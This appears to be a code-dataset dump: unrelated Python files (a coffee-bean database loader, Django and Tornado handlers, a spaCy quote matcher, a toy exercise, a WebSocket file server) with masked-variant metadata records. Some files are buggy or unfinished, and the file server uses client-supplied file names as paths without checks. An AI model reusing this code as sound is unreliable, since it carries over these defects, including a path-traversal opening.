try:\n for i in range(raw_data.shape[0]):\n bean_row = BeanAttributes(id=int(raw_data.iloc[i]['Unnamed: 0']\n ), species=str(raw_data.iloc[i]['Species']), owner=str(\n raw_data.iloc[i]['Owner.1']), country=str(raw_data.iloc[i][\n 'Country.of.Origin']), farm_name=str(raw_data.iloc[i][\n 'Farm.Name']), company=str(raw_data.iloc[i]['Company']),\n region=str(raw_data.iloc[i]['Region']), producer=str(\n raw_data.iloc[i]['Producer']), grading_date=str(raw_data.\n iloc[i]['Grading.Date']), processing_method=str(raw_data.\n iloc[i]['Processing.Method']), aroma=float(raw_data.iloc[i]\n ['Aroma']), flavor=float(raw_data.iloc[i]['Flavor']),\n aftertaste=float(raw_data.iloc[i]['Aftertaste']), acidity=\n float(raw_data.iloc[i]['Acidity']), body=float(raw_data.\n iloc[i]['Body']), balance=float(raw_data.iloc[i]['Balance']\n ), uniformity=float(raw_data.iloc[i]['Uniformity']),\n 
cleancup=float(raw_data.iloc[i]['Clean.Cup']), sweetness=\n float(raw_data.iloc[i]['Sweetness']), total_cup_point=float\n (raw_data.iloc[i]['Total.Cup.Points']), moisture=float(\n raw_data.iloc[i]['Moisture']), color=str(raw_data.iloc[i][\n 'Color']), cluster=int(raw_data.iloc[i]['cluster']))\n session.add(bean_row)\n logger.debug('Row %d added to table ' % i)\n session.commit()\n except sql.exc.IntegrityError:\n logger.error('Duplicated coffee bean')\n except Exception as e:\n logger.error('Incorrect credentials, access denied', e)\n finally:\n session.close()\n\n\nif __name__ == '__main__':\n conn_type = 'mysql+pymysql'\n user = os.environ.get('MYSQL_USER')\n password = os.environ.get('MYSQL_PASSWORD')\n host = os.environ.get('MYSQL_HOST')\n port = os.environ.get('MYSQL_PORT')\n database = os.environ.get('DATABASE_NAME')\n local_database_path = config.LOCAL_DATABASE_PATH\n if config.SQLALCHEMY_DATABASE_URI is None:\n if config.LOCAL_DB_FLAG:\n engine_string = 'sqlite:///{}'.format(local_database_path)\n else:\n engine_string = '{}://{}:{}@{}:{}/{}'.format(conn_type, user,\n password, host, port, database)\n else:\n engine_string = config.SQLALCHEMY_DATABASE_URI\n try:\n engine_string = 'sqlite:///data/bean.db'\n persist_to_db(engine_string)\n logger.info('Data successfully persisted into the database')\n except Exception as e:\n logger.error(e)\n sys.exit(1)\n",
"step-5": "import os\nimport sys\nimport logging.config\nimport sqlalchemy as sql\nfrom sqlalchemy.orm import sessionmaker\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy import Column, Float, String, Text, Integer\nimport pandas as pd\nimport numpy as np\nsys.path.append('./config')\nimport config\n\nlogging.basicConfig(level=logging.INFO, format='%(name)s - %(levelname)s - %(asctime)s - %(message)s')\nlogger = logging.getLogger(__file__)\n\nBase = declarative_base()\n\nclass BeanAttributes(Base):\n \"\"\" Defines the data model for the table `bean_attributes`. \"\"\"\n\n __tablename__ = 'bean_attributes'\n\n id = Column(Integer, primary_key=True)\n species = Column(String(100), unique=False, nullable=True)\n owner = Column(String(100), unique=False, nullable=True)\n country = Column(String(100), unique=False, nullable=True)\n farm_name = Column(String(100), unique=False, nullable=True)\n company = Column(String(100), unique=False, nullable=True)\n region = Column(String(100), unique=False, nullable=True)\n producer = Column(String(100), unique=False, nullable=True)\n grading_date = Column(String(100), unique=False, nullable=True)\n processing_method = Column(Text, unique=False, nullable=True)\n aroma = Column(Float, unique=False, nullable=True)\n flavor = Column(Float, unique=False, nullable=True)\n aftertaste = Column(Float, unique=False, nullable=True)\n acidity = Column(Float, unique=False, nullable=True)\n body = Column(Float, unique=False, nullable=True)\n balance = Column(Float, unique=False, nullable=True)\n uniformity = Column(Float, unique=False, nullable=True)\n cleancup = Column(Float, unique=False, nullable=True)\n sweetness = Column(Float, unique=False, nullable=True)\n total_cup_point = Column(Float, unique=False, nullable=True)\n moisture = Column(Float, unique=False, nullable=True)\n color = Column(String(100), unique=False, nullable=True)\n cluster = Column(Integer, unique=False, nullable=True)\n\n def __repr__(self):\n return '<BeanAttributes %r>' % self.id\n\n\ndef persist_to_db(engine_string):\n \"\"\"Persist the data to database.\n Args:\n engine_string (`str`): Engine string for SQLAlchemy.\n Returns:\n None.\n \"\"\"\n\n engine = sql.create_engine(engine_string)\n Base.metadata.create_all(engine)\n Session = sessionmaker(bind=engine)\n session = Session()\n\n # Delete all existing records in the table\n if config.LOCAL_DB_FLAG:\n try:\n session.execute('''DELETE FROM msia_db.bean_attributes''')\n except:\n pass\n else:\n try:\n session.execute('''DELETE FROM bean_attributes''')\n except:\n pass\n\n # Read the data table and persist it into the database\n raw_data = pd.read_csv(config.DATA_TABLE_PATH)\n raw_data = raw_data.replace(np.nan, '', regex=True)\n\n try:\n for i in range(raw_data.shape[0]):\n bean_row = BeanAttributes(id=int(raw_data.iloc[i]['Unnamed: 0']),\n species=str(raw_data.iloc[i]['Species']),\n owner=str(raw_data.iloc[i]['Owner.1']),\n country=str(raw_data.iloc[i]['Country.of.Origin']),\n farm_name=str(raw_data.iloc[i]['Farm.Name']),\n company=str(raw_data.iloc[i]['Company']),\n region=str(raw_data.iloc[i]['Region']),\n producer=str(raw_data.iloc[i]['Producer']),\n grading_date=str(raw_data.iloc[i]['Grading.Date']),\n processing_method=str(raw_data.iloc[i]['Processing.Method']),\n aroma=float(raw_data.iloc[i]['Aroma']),\n flavor=float(raw_data.iloc[i]['Flavor']),\n aftertaste=float(raw_data.iloc[i]['Aftertaste']),\n acidity=float(raw_data.iloc[i]['Acidity']),\n body=float(raw_data.iloc[i]['Body']),\n 
balance=float(raw_data.iloc[i]['Balance']),\n uniformity=float(raw_data.iloc[i]['Uniformity']),\n cleancup=float(raw_data.iloc[i]['Clean.Cup']),\n sweetness=float(raw_data.iloc[i]['Sweetness']),\n total_cup_point=float(raw_data.iloc[i]['Total.Cup.Points']),\n moisture=float(raw_data.iloc[i]['Moisture']),\n color=str(raw_data.iloc[i]['Color']),\n cluster=int(raw_data.iloc[i]['cluster'])\n )\n session.add(bean_row)\n logger.debug('Row %d added to table ' % i)\n session.commit()\n except sql.exc.IntegrityError: # Check primary key duplication\n logger.error(\"Duplicated coffee bean\")\n except Exception as e:\n logger.error(\"Incorrect credentials, access denied\", e)\n finally:\n session.close()\n\n\nif __name__ == \"__main__\":\n\n # Obtain parameters from os\n conn_type = \"mysql+pymysql\"\n user = os.environ.get(\"MYSQL_USER\")\n password = os.environ.get(\"MYSQL_PASSWORD\")\n host = os.environ.get(\"MYSQL_HOST\")\n port = os.environ.get(\"MYSQL_PORT\")\n database = os.environ.get(\"DATABASE_NAME\")\n local_database_path = config.LOCAL_DATABASE_PATH\n\n # If users wish to write to their own SQLALCHEMY_DATABASE_URI in the environment\n if config.SQLALCHEMY_DATABASE_URI is None:\n # Whether to create a local SQLite database or an AWS RDS database\n if config.LOCAL_DB_FLAG:\n engine_string = \"sqlite:///{}\".format(local_database_path)\n else:\n engine_string = \"{}://{}:{}@{}:{}/{}\".format(conn_type, user, password, host, port, database)\n else:\n engine_string = config.SQLALCHEMY_DATABASE_URI\n\n try:\n engine_string = 'sqlite:///data/bean.db'\n persist_to_db(engine_string)\n logger.info(\"Data successfully persisted into the database\")\n except Exception as e:\n logger.error(e)\n sys.exit(1)\n\n\n",
"step-ids": [
5,
6,
7,
8,
9
]
}
|
[
5,
6,
7,
8,
9
] |
from django.views.generic import TemplateView, FormView, CreateView, ListView
from .models import Order
from .form import OrderForm
class OrdersListView(ListView):
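    """List every Order; the template receives the queryset as 'order_list'."""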
template_name = 'orders/index.html'
queryset = Order.objects.all()
context_object_name = 'order_list'
class OrderCreateView(CreateView):
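    """Render OrderForm and redirect to '/' on successful creation."""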
template_name = 'orders/form.html'
form_class = OrderForm
success_url = '/'
|
normal
|
{
"blob_id": "afd184962e8e69843ca518e140d5fdde3d7c9ed2",
"index": 7456,
"step-1": "<mask token>\n\n\nclass OrderCreateView(CreateView):\n template_name = 'orders/form.html'\n form_class = OrderForm\n success_url = '/'\n",
"step-2": "<mask token>\n\n\nclass OrdersListView(ListView):\n <mask token>\n <mask token>\n <mask token>\n\n\nclass OrderCreateView(CreateView):\n template_name = 'orders/form.html'\n form_class = OrderForm\n success_url = '/'\n",
"step-3": "<mask token>\n\n\nclass OrdersListView(ListView):\n template_name = 'orders/index.html'\n queryset = Order.objects.all()\n context_object_name = 'order_list'\n\n\nclass OrderCreateView(CreateView):\n template_name = 'orders/form.html'\n form_class = OrderForm\n success_url = '/'\n",
"step-4": "from django.views.generic import TemplateView, FormView, CreateView, ListView\nfrom .models import Order\nfrom .form import OrderForm\n\n\nclass OrdersListView(ListView):\n template_name = 'orders/index.html'\n queryset = Order.objects.all()\n context_object_name = 'order_list'\n\n\nclass OrderCreateView(CreateView):\n template_name = 'orders/form.html'\n form_class = OrderForm\n success_url = '/'\n",
"step-5": null,
"step-ids": [
2,
3,
4,
5
]
}
|
[
2,
3,
4,
5
] |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import tornado.web
import tornado.escape
from sqlalchemy import desc
from sqlalchemy.orm import contains_eager
from main_app.models.post import Post
from main_app.models.thread import PostThread, User2Thread
from main_app.handlers.base_handler import BaseHandler
class API_Comments(BaseHandler):
def post(self):
'''
add comment to a post
example:
POST /comment
body: post_id, text
returns:
200 - the comment created
406 - incorrect data
'''
        # assume the 'comment' argument carries a JSON-encoded object
        # with 'post_id' and 'text' fields
        try:
            arg_comment = tornado.escape.json_decode(self.get_argument('comment'))
            post_id = int(arg_comment['post_id'])
            text = str(arg_comment['text'])
        except (tornado.web.MissingArgumentError, ValueError, TypeError, KeyError):
            raise tornado.web.HTTPError(406)
if not text:
# the comment text is empty
raise tornado.web.HTTPError(406)
# get post + thread + User2Thread
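        # keep only threads that the current user or the default user may post
        # to; ordering by user_id desc is assumed to prefer the user-specific
        # User2Thread row over the default one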
post = self.db.query(Post).\
join(
PostThread, Post.thread_id == PostThread.id
).join(
User2Thread
).options(
contains_eager(PostThread.user2thread)
).filter(
Post.id == post_id
).filter(
                User2Thread.user_id.in_([DEFAULT_USER_ID, self.current_user]),
).filter(
User2Thread.is_current()
).filter(
User2Thread.allow_add_posts == True
).order_by(
desc(User2Thread.user_id)
).first()
|
normal
|
{
"blob_id": "5186400c9b3463d6be19e73de665f8792d8d68c7",
"index": 6982,
"step-1": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport tornado.web\n\nfrom sqlalchemy import desc\nfrom sqlalchemy.orm import contains_eager\n\nfrom main_app.models.post import Post\nfrom main_app.models.thread import PostThread, User2Thread\n\nfrom main_app.handlers.base_handler import BaseHandler\n\n\nclass API_Comments(BaseHandler):\n\n def post(self):\n '''\n add comment to a post\n\n example:\n POST /comment\n body: post_id, text\n\n returns:\n 200 - the comment created\n 406 - incorrect data\n '''\n arg_comment = self.get_argument('comment')\n try:\n post_id = int(arg_comment['post_id'])\n text = str(arg_comment['text'])\n except KeyError, ValueError:\n raise tornado.web.HTTPError(406)\n if not text:\n # the comment text is empty\n raise tornado.web.HTTPError(406)\n # get post + thread + User2Thread\n post = self.db.query(Post).\\\n join(\n PostThread, Post.thread_id == PostThread.id\n ).join(\n User2Thread\n ).options(\n contains_eager(PostThread.user2thread)\n ).filter(\n Post.id == post_id\n ).filter(\n User2Thread.user_id.in_(DEFAULT_USER_ID, self.current_user),\n ).filter(\n User2Thread.is_current()\n ).filter(\n User2Thread.allow_add_posts == True\n ).order_by(\n desc(User2Thread.user_id)\n ).first()",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
## Author: Aleem Juma
import os
from app import app
import pandas as pd
# read in the quotes database
q = pd.read_csv(os.path.join('app','data','quotes_all.csv'), sep=';', skiprows=1, header=0)
# there are a few quote genres that don't occur in the model vocab
# replace them with appropriate words so the similarity search works
replace = {
'movingon':'moving',
'fathersday': 'fathers',
'memorialday': 'memorial',
'mothersday': 'mothers',
'newyears': 'year',
'saintpatricksday': 'ireland',
'valentinesday': 'valentine'
}
q['GENRE'].replace(to_replace=replace, inplace=True)
import spacy
nlp = spacy.load('en_core_web_md')
# cache the computed tokens for the genres in the dataset
cache = {genre:nlp(genre) for genre in q.GENRE.unique()}
def get_similarity(word1, word2):
'''
Returns a similarity score between two words
'''
tok1 = cache.get(word1, nlp(word1))
tok2 = cache.get(word2, nlp(word2))
return tok1.similarity(tok2)
def get_random_word():
'''
Returns a random category label from the data
'''
random_word = q['GENRE'].sample(1).iloc[0]
return random_word
def get_closest_words(word, choices, n=1):
'''
Returns the n closest matches in the model vocab
Parameters:
word word to search
choices available matches
n number of results to return
Returns:
A list of n tuples in the form (word (str), similarity (float))
'''
app.logger.info(f'Finding closest words to "{word}"')
if word in choices:
# if the word is already in the list return the same word with 100% match
return [(word, 1.0)]
if word in nlp.vocab.strings:
# if not in the list, find the closest words
similarities = [(choice, get_similarity(word, choice)) for choice in choices]
# sort, reverse, and return the top n (word,similarity) tuples
return sorted(similarities, key=lambda x: x[1])[::-1][:n]
else:
app.logger.info(f'Not in model vocab: "{word}"')
# if the requested label isn't in the model vocab, return a random genre
return [(get_random_word(), 1.0), (word, 0.0)]
def find_matching_quote(genre, top_n=5):
'''
Returns a matching quote and up to 5 of the most similar genres with similarity measures
    Parameters:
genre genre to match
Returns:
(str) Quote
(str) Author
        (list) List of tuples in the form (word (str), similarity (float))
'''
# find closest matches
matched_genres = get_closest_words(genre, q.GENRE.unique(), top_n)
# get the best one
closest = matched_genres[0][0]
app.logger.info(f'Finding quote for: "{closest}"')
# get a quote from that genre
matching_quote = q[q['GENRE']==closest].sample(1).iloc[0]
quote = matching_quote.QUOTE
author = matching_quote.AUTHOR
# return the quote and the genres
return quote, author, matched_genres
|
normal
|
{
"blob_id": "8f854f4f2c807f988945af4dc53dba93cfb31168",
"index": 9441,
"step-1": "<mask token>\n\n\ndef get_similarity(word1, word2):\n \"\"\"\n Returns a similarity score between two words\n \"\"\"\n tok1 = cache.get(word1, nlp(word1))\n tok2 = cache.get(word2, nlp(word2))\n return tok1.similarity(tok2)\n\n\n<mask token>\n\n\ndef get_closest_words(word, choices, n=1):\n \"\"\"\n Returns the n closest matches in the model vocab\n Parameters:\n word word to search\n choices available matches\n n number of results to return\n\n Returns:\n A list of n tuples in the form (word (str), similarity (float))\n \"\"\"\n app.logger.info(f'Finding closest words to \"{word}\"')\n if word in choices:\n return [(word, 1.0)]\n if word in nlp.vocab.strings:\n similarities = [(choice, get_similarity(word, choice)) for choice in\n choices]\n return sorted(similarities, key=lambda x: x[1])[::-1][:n]\n else:\n app.logger.info(f'Not in model vocab: \"{word}\"')\n return [(get_random_word(), 1.0), (word, 0.0)]\n\n\ndef find_matching_quote(genre, top_n=5):\n \"\"\"\n Returns a matching quote and up to 5 of the most similar genres with similarity measures\n Paramters:\n genre genre to match\n\n Returns:\n (str) Quote\n (str) Author\n (list) List of tuples in the form (word (str), simliarity (float))\n \"\"\"\n matched_genres = get_closest_words(genre, q.GENRE.unique(), top_n)\n closest = matched_genres[0][0]\n app.logger.info(f'Finding quote for: \"{closest}\"')\n matching_quote = q[q['GENRE'] == closest].sample(1).iloc[0]\n quote = matching_quote.QUOTE\n author = matching_quote.AUTHOR\n return quote, author, matched_genres\n",
"step-2": "<mask token>\nq['GENRE'].replace(to_replace=replace, inplace=True)\n<mask token>\n\n\ndef get_similarity(word1, word2):\n \"\"\"\n Returns a similarity score between two words\n \"\"\"\n tok1 = cache.get(word1, nlp(word1))\n tok2 = cache.get(word2, nlp(word2))\n return tok1.similarity(tok2)\n\n\ndef get_random_word():\n \"\"\"\n Returns a random category label from the data\n \"\"\"\n random_word = q['GENRE'].sample(1).iloc[0]\n return random_word\n\n\ndef get_closest_words(word, choices, n=1):\n \"\"\"\n Returns the n closest matches in the model vocab\n Parameters:\n word word to search\n choices available matches\n n number of results to return\n\n Returns:\n A list of n tuples in the form (word (str), similarity (float))\n \"\"\"\n app.logger.info(f'Finding closest words to \"{word}\"')\n if word in choices:\n return [(word, 1.0)]\n if word in nlp.vocab.strings:\n similarities = [(choice, get_similarity(word, choice)) for choice in\n choices]\n return sorted(similarities, key=lambda x: x[1])[::-1][:n]\n else:\n app.logger.info(f'Not in model vocab: \"{word}\"')\n return [(get_random_word(), 1.0), (word, 0.0)]\n\n\ndef find_matching_quote(genre, top_n=5):\n \"\"\"\n Returns a matching quote and up to 5 of the most similar genres with similarity measures\n Paramters:\n genre genre to match\n\n Returns:\n (str) Quote\n (str) Author\n (list) List of tuples in the form (word (str), simliarity (float))\n \"\"\"\n matched_genres = get_closest_words(genre, q.GENRE.unique(), top_n)\n closest = matched_genres[0][0]\n app.logger.info(f'Finding quote for: \"{closest}\"')\n matching_quote = q[q['GENRE'] == closest].sample(1).iloc[0]\n quote = matching_quote.QUOTE\n author = matching_quote.AUTHOR\n return quote, author, matched_genres\n",
"step-3": "<mask token>\nq = pd.read_csv(os.path.join('app', 'data', 'quotes_all.csv'), sep=';',\n skiprows=1, header=0)\nreplace = {'movingon': 'moving', 'fathersday': 'fathers', 'memorialday':\n 'memorial', 'mothersday': 'mothers', 'newyears': 'year',\n 'saintpatricksday': 'ireland', 'valentinesday': 'valentine'}\nq['GENRE'].replace(to_replace=replace, inplace=True)\n<mask token>\nnlp = spacy.load('en_core_web_md')\ncache = {genre: nlp(genre) for genre in q.GENRE.unique()}\n\n\ndef get_similarity(word1, word2):\n \"\"\"\n Returns a similarity score between two words\n \"\"\"\n tok1 = cache.get(word1, nlp(word1))\n tok2 = cache.get(word2, nlp(word2))\n return tok1.similarity(tok2)\n\n\ndef get_random_word():\n \"\"\"\n Returns a random category label from the data\n \"\"\"\n random_word = q['GENRE'].sample(1).iloc[0]\n return random_word\n\n\ndef get_closest_words(word, choices, n=1):\n \"\"\"\n Returns the n closest matches in the model vocab\n Parameters:\n word word to search\n choices available matches\n n number of results to return\n\n Returns:\n A list of n tuples in the form (word (str), similarity (float))\n \"\"\"\n app.logger.info(f'Finding closest words to \"{word}\"')\n if word in choices:\n return [(word, 1.0)]\n if word in nlp.vocab.strings:\n similarities = [(choice, get_similarity(word, choice)) for choice in\n choices]\n return sorted(similarities, key=lambda x: x[1])[::-1][:n]\n else:\n app.logger.info(f'Not in model vocab: \"{word}\"')\n return [(get_random_word(), 1.0), (word, 0.0)]\n\n\ndef find_matching_quote(genre, top_n=5):\n \"\"\"\n Returns a matching quote and up to 5 of the most similar genres with similarity measures\n Paramters:\n genre genre to match\n\n Returns:\n (str) Quote\n (str) Author\n (list) List of tuples in the form (word (str), simliarity (float))\n \"\"\"\n matched_genres = get_closest_words(genre, q.GENRE.unique(), top_n)\n closest = matched_genres[0][0]\n app.logger.info(f'Finding quote for: \"{closest}\"')\n matching_quote = q[q['GENRE'] == closest].sample(1).iloc[0]\n quote = matching_quote.QUOTE\n author = matching_quote.AUTHOR\n return quote, author, matched_genres\n",
"step-4": "import os\nfrom app import app\nimport pandas as pd\nq = pd.read_csv(os.path.join('app', 'data', 'quotes_all.csv'), sep=';',\n skiprows=1, header=0)\nreplace = {'movingon': 'moving', 'fathersday': 'fathers', 'memorialday':\n 'memorial', 'mothersday': 'mothers', 'newyears': 'year',\n 'saintpatricksday': 'ireland', 'valentinesday': 'valentine'}\nq['GENRE'].replace(to_replace=replace, inplace=True)\nimport spacy\nnlp = spacy.load('en_core_web_md')\ncache = {genre: nlp(genre) for genre in q.GENRE.unique()}\n\n\ndef get_similarity(word1, word2):\n \"\"\"\n Returns a similarity score between two words\n \"\"\"\n tok1 = cache.get(word1, nlp(word1))\n tok2 = cache.get(word2, nlp(word2))\n return tok1.similarity(tok2)\n\n\ndef get_random_word():\n \"\"\"\n Returns a random category label from the data\n \"\"\"\n random_word = q['GENRE'].sample(1).iloc[0]\n return random_word\n\n\ndef get_closest_words(word, choices, n=1):\n \"\"\"\n Returns the n closest matches in the model vocab\n Parameters:\n word word to search\n choices available matches\n n number of results to return\n\n Returns:\n A list of n tuples in the form (word (str), similarity (float))\n \"\"\"\n app.logger.info(f'Finding closest words to \"{word}\"')\n if word in choices:\n return [(word, 1.0)]\n if word in nlp.vocab.strings:\n similarities = [(choice, get_similarity(word, choice)) for choice in\n choices]\n return sorted(similarities, key=lambda x: x[1])[::-1][:n]\n else:\n app.logger.info(f'Not in model vocab: \"{word}\"')\n return [(get_random_word(), 1.0), (word, 0.0)]\n\n\ndef find_matching_quote(genre, top_n=5):\n \"\"\"\n Returns a matching quote and up to 5 of the most similar genres with similarity measures\n Paramters:\n genre genre to match\n\n Returns:\n (str) Quote\n (str) Author\n (list) List of tuples in the form (word (str), simliarity (float))\n \"\"\"\n matched_genres = get_closest_words(genre, q.GENRE.unique(), top_n)\n closest = matched_genres[0][0]\n app.logger.info(f'Finding quote for: \"{closest}\"')\n matching_quote = q[q['GENRE'] == closest].sample(1).iloc[0]\n quote = matching_quote.QUOTE\n author = matching_quote.AUTHOR\n return quote, author, matched_genres\n",
"step-5": "## Author: Aleem Juma\n\nimport os\nfrom app import app\nimport pandas as pd\n\n# read in the quotes database\nq = pd.read_csv(os.path.join('app','data','quotes_all.csv'), sep=';', skiprows=1, header=0)\n\n# there are a few quote genres that don't occur in the model vocab\n# replace them with appropriate words so the similarity search works\nreplace = {\n 'movingon':'moving',\n 'fathersday': 'fathers',\n 'memorialday': 'memorial',\n 'mothersday': 'mothers',\n 'newyears': 'year',\n 'saintpatricksday': 'ireland',\n 'valentinesday': 'valentine'\n}\nq['GENRE'].replace(to_replace=replace, inplace=True)\n\nimport spacy\nnlp = spacy.load('en_core_web_md')\n# cache the computed tokens for the genres in the dataset\ncache = {genre:nlp(genre) for genre in q.GENRE.unique()}\n\ndef get_similarity(word1, word2):\n '''\n Returns a similarity score between two words\n '''\n tok1 = cache.get(word1, nlp(word1))\n tok2 = cache.get(word2, nlp(word2))\n return tok1.similarity(tok2)\n\ndef get_random_word():\n '''\n Returns a random category label from the data\n '''\n random_word = q['GENRE'].sample(1).iloc[0]\n return random_word\n\ndef get_closest_words(word, choices, n=1):\n '''\n Returns the n closest matches in the model vocab\n Parameters:\n word word to search\n choices available matches\n n number of results to return\n\n Returns:\n A list of n tuples in the form (word (str), similarity (float))\n '''\n app.logger.info(f'Finding closest words to \"{word}\"')\n if word in choices:\n # if the word is already in the list return the same word with 100% match\n return [(word, 1.0)]\n if word in nlp.vocab.strings:\n # if not in the list, find the closest words\n similarities = [(choice, get_similarity(word, choice)) for choice in choices]\n # sort, reverse, and return the top n (word,similarity) tuples\n return sorted(similarities, key=lambda x: x[1])[::-1][:n]\n else:\n app.logger.info(f'Not in model vocab: \"{word}\"')\n # if the requested label isn't in the model vocab, return a random genre\n return [(get_random_word(), 1.0), (word, 0.0)]\n\ndef find_matching_quote(genre, top_n=5):\n '''\n Returns a matching quote and up to 5 of the most similar genres with similarity measures\n Paramters:\n genre genre to match\n\n Returns:\n (str) Quote\n (str) Author\n (list) List of tuples in the form (word (str), simliarity (float))\n '''\n # find closest matches\n matched_genres = get_closest_words(genre, q.GENRE.unique(), top_n)\n # get the best one\n closest = matched_genres[0][0]\n app.logger.info(f'Finding quote for: \"{closest}\"')\n # get a quote from that genre\n matching_quote = q[q['GENRE']==closest].sample(1).iloc[0]\n quote = matching_quote.QUOTE\n author = matching_quote.AUTHOR\n # return the quote and the genres\n return quote, author, matched_genres\n",
"step-ids": [
3,
5,
6,
7,
8
]
}
|
[
3,
5,
6,
7,
8
] |
def alt(h, dt):
    t = 0
    while True:
        t = t + 1
        a = -6 * t ** 4 + h * t ** 3 + 2 * t ** 2 + t
        if a <= 0:
            print('The balloon first touches ground at hour:')
            print(t)
            break
        elif t == dt:
            print('The balloon does not touch ground in the given time.')
            break
    return
alt(int(input()), int(input()))
|
normal
|
{
"blob_id": "592f29f08637e511bd7d49a3b58f69b700721d89",
"index": 8083,
"step-1": "<mask token>\n",
"step-2": "def alt(h, dt):\n t = 0\n while True:\n t = t + 1\n a = -6 * t ** 4 + h * t ** 3 + 2 * t ** 2 + t\n if a <= 0:\n print('The balloon first touches ground at hour:')\n print(t)\n break\n elif t == dt:\n print('The balloon does not touch ground in the given time.')\n break\n return\n\n\n<mask token>\n",
"step-3": "def alt(h, dt):\n t = 0\n while True:\n t = t + 1\n a = -6 * t ** 4 + h * t ** 3 + 2 * t ** 2 + t\n if a <= 0:\n print('The balloon first touches ground at hour:')\n print(t)\n break\n elif t == dt:\n print('The balloon does not touch ground in the given time.')\n break\n return\n\n\nalt(int(input()), int(input()))\n",
"step-4": "def alt(h, dt):\n t=0\n while True:\n t=t+1\n a=(-6)*(t**4)+ h*(t**3)+2*(t**2)+t\n \n if a<=0:\n print('The balloon first touches ground at hour:')\n print(t)\n break\n elif t==dt:\n print('The balloon does not touch ground in the given time.')\n break\n return\nalt(int(input()), int(input()))",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
import os
import sys
import json
from subprocess import Popen, PIPE, STDOUT
from twisted.internet.task import deferLater
from twisted.internet import reactor
from autobahn.twisted.websocket import WebSocketServerFactory, WebSocketServerProtocol, listenWS
from utils import rsync
# TODO: Add Twisted logger
# TODO: Create plugin for fileserver (using twistd)
# TODO: Thinking about using SSL over my WebSockets message-based protocol (OR using AES algorithm?)
CONFIG_IP = 'localhost'
CONFIG_PORT = 8888
CONFIG_TEMPLATE = ''
CONFIG_DATA = {}
BATCH_SIZE = 1 * 2 ** 20
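# 1 * 2**20 bytes = 1 MiB; defined here but not referenced elsewhere in this module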
def sendPrefences(port):
p = Popen(["python", "./utils/preferences_sender.py", str(CONFIG_TEMPLATE), str(port)], stdout=PIPE, stdin=PIPE, stderr=STDOUT)
result = p.communicate()[0]
class MessageBasedServerProtocol(WebSocketServerProtocol):
"""
Message-based WebSockets server
Template contains some parts as string:
[USER_ID:OPERATION_NAME:FILE_ID:FILE_ENC_PASSWORD] - 15 symbols for USER_ID,
10 symbols for OPERATION_NAME,
25 symbols for FILE_ID
32 symbols for FILE_ENC_PASSWORD
other - some data
"""
def __init__(self):
path = CONFIG_DATA['path']
base_dir = CONFIG_DATA['base_dir']
# prepare to working with files...
if os.path.exists(path) and os.path.isdir(path):
os.chdir(path)
if not os.path.exists(base_dir) or not os.path.isdir(base_dir):
os.mkdir(base_dir)
os.chdir(base_dir)
else:
os.mkdir(path)
os.chdir(path)
os.mkdir(base_dir)
os.chdir(base_dir)
# init some things
self.fullpath = path + '/' + base_dir
self.status = 'ONLINE'
self.commands_handlers = self.__initHandlersUser()
self.file_1 = self.file_2 = self.delta_sync = None
self.file_enc_psw = None
def __initHandlersUser(self):
"""
Initialize handlers for every command
"""
handlers = {}
handlers['WRITE_FILE'] = self.write_file
handlers['READU_FILE'] = self.read_file
handlers['DELET_FILE'] = self.delete_file
handlers['STATUS_SRV'] = self.status_server
handlers['RSYNC_FILE'] = self.rsync_file
handlers['WSYNC_FILE'] = self.wsync_file
return handlers
def __checkUserCatalog(self, user_id):
# prepare to working with files...
os.chdir(self.fullpath)
if not os.path.exists(user_id) or not os.path.isdir(user_id):
os.mkdir(user_id)
os.chdir(user_id)
else:
os.chdir(self.fullpath + '/' + user_id)
def __get_standart_states(self):
return "C", 'Succesfull!'
def write_file(self, user_id, file_id, data):
print "[USER] User with %s was write a file..." % (self.transport.getPeer())
status, commentary = self.__get_standart_states()
self.__checkUserCatalog(user_id)
self.status = 'BUSY'
operation = "WRT"
try:
f = open(file_id, "wb")
f.write(data)
except IOError, argument:
status = "E"
commentary = argument
except Exception, argument:
status = "E"
commentary = argument
raise Exception(argument)
finally:
f.close()
self.status = 'ONLINE'
return operation, status, commentary
def read_file(self, user_id, file_id, data):
print "[USER] User with %s was read a file..." % (self.transport.getPeer())
status, commentary = self.__get_standart_states()
self.__checkUserCatalog(user_id)
self.status = 'BUSY'
operation = "REA"
try:
f = open(file_id, "rb")
commentary = f.read()
except IOError, argument:
status = "E"
commentary = argument
except Exception, argument:
status = "E"
commentary = argument
raise Exception(argument)
finally:
f.close()
self.status = 'ONLINE'
return operation, status, commentary
def delete_file(self, user_id, file_id, data):
print "[USER] User with %s was delete a file..." % (self.transport.getPeer())
status, commentary = self.__get_standart_states()
self.__checkUserCatalog(user_id)
self.status = 'BUSY'
operation = "DEL"
try:
os.remove(file_id)
except IOError, argument:
status = "E"
commentary = argument
except Exception, argument:
status = "E"
commentary = argument
raise Exception(argument)
self.status = 'ONLINE'
return operation, status, commentary
def rsync_file(self, user_id, file_id, data):
print "[USER] User with %s sync files..." % (self.transport.getPeer())
status, commentary = self.__get_standart_states()
self.__checkUserCatalog(user_id)
self.status = 'BUSY'
operation = "RSY"
try:
f = open(file_id, "rb")
commentary = f.read()
except IOError, argument:
status = "E"
commentary = argument
except Exception, argument:
status = "E"
commentary = argument
raise Exception(argument)
self.status = 'ONLINE'
return operation, status, commentary
def wsync_file(self, user_id, file_id, data):
print "[USER] User with %s sync files..." % (self.transport.getPeer())
status, commentary = self.__get_standart_states()
self.__checkUserCatalog(user_id)
self.status = 'BUSY'
operation = "WRT"
try:
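            # rsync-style update: checksum the stored copy, write the incoming bytes to a
            # swap file, compute a delta against those checksums, patch into <file_id>.new,
            # then replace the original with the patched file and remove the swap file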
unpatched = open(file_id, "rb")
hashes = rsync.blockchecksums(unpatched)
new_file = file_id + '.new'
swap_path = file_id + '~'
with open(swap_path, "wb") as out_file:
out_file.write(data)
patchedfile = open(swap_path, "rb")
delta = rsync.rsyncdelta(patchedfile, hashes)
unpatched.seek(0)
save_to = open(new_file, "wb")
rsync.patchstream(unpatched, save_to, delta)
save_to.close()
patchedfile.close()
unpatched.close()
if os.path.exists(file_id):
os.remove(file_id)
os.rename(new_file, file_id)
if os.path.exists(swap_path):
os.remove(swap_path)
except IOError, argument:
status = "E"
commentary = argument
